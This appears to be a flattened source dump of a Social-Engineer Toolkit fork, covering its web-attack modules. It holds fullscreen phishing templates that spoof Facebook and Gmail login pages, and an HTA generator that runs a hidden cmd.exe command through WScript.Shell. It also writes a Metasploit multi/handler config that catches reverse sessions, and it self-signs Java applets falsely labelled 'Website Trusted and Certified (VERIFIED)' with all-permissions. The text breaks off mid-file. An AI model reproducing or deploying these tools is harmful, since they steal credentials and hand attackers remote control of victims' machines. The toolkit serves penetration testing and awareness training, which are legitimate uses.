https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-center.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-center.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-center.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-center.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/facebox/closelabel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/facebox/closelabel.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/facebox/loading.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/facebox/loading.gif -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/fb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/fb.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/flogin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/flogin.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-safari-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-safari-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/js/libs/browser-detect.js: -------------------------------------------------------------------------------- 1 | var BrowserDetect = { 2 | init: function () { 3 | this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; 4 | this.version = this.searchVersion(navigator.userAgent) 5 | || this.searchVersion(navigator.appVersion) 6 | || "an unknown version"; 7 | this.OS = this.searchString(this.dataOS) || "an unknown OS"; 8 | }, 9 | searchString: function (data) { 10 | for (var i=0;idemo will still work but you will see Chrome's UI instead of your own browser's UI."); 42 | } 43 | 44 | // OS detect 45 | if (BrowserDetect.OS == "Mac") { 46 | $('html').addClass('osx'); 47 | } else if (BrowserDetect.OS == "Windows") { 48 | $('html').addClass('windows'); 49 | } else if (BrowserDetect.OS == "Linux") { 50 | $('html').addClass('linux'); 51 | } else { 52 | errors.push("You're not using an Windows, Mac OS X, or Linux. The demo will not work on your OS."); 53 | } 54 | 55 | } else { 56 | errors.push("Your browser does not support the Fullscreen API. Sorry - this demo will not work for you. Try Chrome, Firefox, or Safari 6 (on OS X 10.8 Mountain Lion)."); 57 | } 58 | 59 | // Errors? 60 | if (errors.length) { 61 | $.each(errors, function(i, error) { 62 | errorStr += error; 63 | if (i != errors.length - 1) { 64 | errorStr += "

"; 65 | } 66 | }); 67 | } 68 | 69 | // Set class on html element that represents the fullscreen state 70 | $(document).on('fullscreenchange', function(test) { 71 | if (document.fullscreenEnabled) { 72 | $('html').addClass('fullscreened').removeClass('not-fullscreened'); 73 | } else { 74 | $('html').addClass('not-fullscreened').removeClass('fullscreened'); 75 | $('html').off('click.spoof'); 76 | } 77 | }); 78 | $(document).trigger('fullscreenchange'); 79 | 80 | // Handle click on target link 81 | $('html').on('click', '.spoofLink', function(e) { 82 | 83 | // Prevent navigation to legit link 84 | e.preventDefault(); 85 | e.stopPropagation(); 86 | 87 | // Show error if browser doesn't support fullscreen 88 | if (!window.fullscreenSupport) { 89 | $.facebox(errorStr); 90 | return; 91 | } 92 | 93 | // Trigger fullscreen 94 | requestFullScreen(); 95 | 96 | // Set target site to proper height, based on window size 97 | $('#spoofSite').css({ 98 | top: $('#spoofHeader').height(), 99 | height: $(window).height() 100 | }); 101 | 102 | 103 | 104 | // Callout when the user clicks on something from fake UI 105 | $('html').on('click.spoof', function() { 106 | // $('#spoofHeader').stop().effect('', function() { 107 | //$.facebox({div: '#phished'}); 108 | // }); 109 | 110 | }); 111 | }); 112 | 113 | }); 114 | 115 | -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/css/facebox.css: -------------------------------------------------------------------------------- 1 | #facebox { 2 | position: absolute; 3 | top: 0; 4 | left: 0; 5 | z-index: 100; 6 | text-align: left; 7 | } 8 | 9 | 10 | #facebox .popup{ 11 | position:relative; 12 | border:3px solid rgba(0,0,0,0); 13 | -webkit-border-radius:5px; 14 | -moz-border-radius:5px; 15 | border-radius:5px; 16 | -webkit-box-shadow:0 0 18px rgba(0,0,0,0.4); 17 | -moz-box-shadow:0 0 18px rgba(0,0,0,0.4); 18 | box-shadow:0 0 18px rgba(0,0,0,0.4); 19 | } 20 | 21 | #facebox .content { 22 | display:table; 23 | width: 370px; 24 | padding: 10px; 25 | background: #fff; 26 | -webkit-border-radius:4px; 27 | -moz-border-radius:4px; 28 | border-radius:4px; 29 | } 30 | 31 | #facebox .content > p:first-child{ 32 | margin-top:0; 33 | } 34 | #facebox .content > p:last-child{ 35 | margin-bottom:0; 36 | } 37 | 38 | #facebox .close{ 39 | position:absolute; 40 | top:5px; 41 | right:5px; 42 | padding:2px; 43 | background:#fff; 44 | } 45 | #facebox .close img{ 46 | opacity:0.3; 47 | } 48 | #facebox .close:hover img{ 49 | opacity:1.0; 50 | } 51 | 52 | #facebox .loading { 53 | text-align: center; 54 | } 55 | 56 | #facebox .image { 57 | text-align: center; 58 | } 59 | 60 | #facebox img { 61 | border: 0; 62 | margin: 0; 63 | } 64 | 65 | #facebox_overlay { 66 | position: fixed; 67 | top: 0px; 68 | left: 0px; 69 | height:100%; 70 | width:100%; 71 | } 72 | 73 | .facebox_hide { 74 | z-index:-100; 75 | } 76 | 77 | .facebox_overlayBG { 78 | background-color: #000; 79 | z-index: 99; 80 | } -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-firefox-center.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-firefox-center.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-safari-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-safari-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-safari-center.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-safari-center.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-safari-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-safari-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-safari-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-safari-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/facebox/closelabel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/facebox/closelabel.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/facebox/loading.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/facebox/loading.gif -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/glogin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/glogin.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/gmail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/gmail.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/lgmail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/lgmail.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-safari-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-safari-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/js/libs/browser-detect.js: -------------------------------------------------------------------------------- 1 | var BrowserDetect = { 2 | init: function () { 3 | this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; 4 | this.version = this.searchVersion(navigator.userAgent) 5 | || this.searchVersion(navigator.appVersion) 6 | || "an unknown version"; 7 | this.OS = this.searchString(this.dataOS) || "an unknown OS"; 8 | }, 9 | searchString: function (data) { 10 | for (var i=0;i\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n""" % (command) 31 | main2 = """""" 32 | 33 | # metasploit answer file here 34 | filewrite = file(setdir + "/meta_config", "w") 35 | filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port)) 36 | filewrite.close() 37 | 38 | # write out main1 and main2 39 | filewrite = file(setdir + "/hta_index", "w") 40 | filewrite.write(main2) 41 | filewrite.close() 42 | 43 | # write out launcher.hta 44 | filewrite = file(setdir + "/Launcher.hta", "w") 45 | filewrite.write(main1) 46 | filewrite.close() 47 | -------------------------------------------------------------------------------- /src/webattack/java_applet/manifest.mf: -------------------------------------------------------------------------------- 1 | Permissions: all-permissions 2 | Codebase: * 3 | Application-Name: Website Trusted and Certified (VERIFIED) 4 | -------------------------------------------------------------------------------- /src/webattack/java_applet/sign.sh: -------------------------------------------------------------------------------- 1 | cp ../../html/unsigned/unsigned.jar Java_Exploit.jar 2 | jar ufm Java_Exploit.jar manifest.mf 3 | jarsigner -storetype pkcs12 -keystore /root/certs/MyCert.pfx Java_Exploit.jar "1" 4 | cp Java_Exploit.jar Signed_Update.jar.orig 5 | cp Java_Exploit.jar ../../html/Signed_Update.jar.orig 6 | -------------------------------------------------------------------------------- /src/webattack/java_applet/sign_jar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # simple jar file 4 | # 5 | import subprocess 6 | import os 7 | try: 8 | print """ 9 | Simply enter in the required fields, easy example below: 10 | 11 | Name: FakeCompany 12 | Organization: Fake Company 13 | Organization Name: Fake Company 14 | City: Cleveland 15 | State: Ohio 16 | Country: US 17 | Is this correct: yes 18 | 19 | """ 20 | print """*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***""" 21 | # grab keystore to use later 22 | subprocess.Popen("keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait() 23 | # self-sign the applet 24 | subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait() 25 | # move it into our html directory 26 | subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait() 27 | subprocess.Popen("cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait() 28 | subprocess.Popen("cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait() 29 | print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)" 30 | except: 31 | pass 32 | -------------------------------------------------------------------------------- /src/webattack/java_applet/unsigned.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # simple jar file 4 | # 5 | import subprocess 6 | import os 7 | subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) 8 | subprocess.Popen("rm Java.class", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) 9 | subprocess.Popen("javac Java.java", shell=True).wait() 10 | subprocess.Popen("jar cvf Java_Update.jar Java.class", shell=True).wait() 11 | subprocess.Popen("jar ufm Java_Update.jar manifest.mf", shell=True).wait() 12 | subprocess.Popen("cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True) 13 | print "[*] Jar file exported as Java_Update.jar" 14 | -------------------------------------------------------------------------------- /src/webattack/mlitm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/mlitm/__init__.py -------------------------------------------------------------------------------- /src/webattack/multi_attack/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/multi_attack/__init__.py -------------------------------------------------------------------------------- /src/webattack/profiler/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/profiler/__init__.py -------------------------------------------------------------------------------- /src/webattack/profiler/webprofiler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # victim profile code here 4 | # 5 | 6 | from src.core.setcore import return_continue, print_info 7 | 8 | def prep_website(): 9 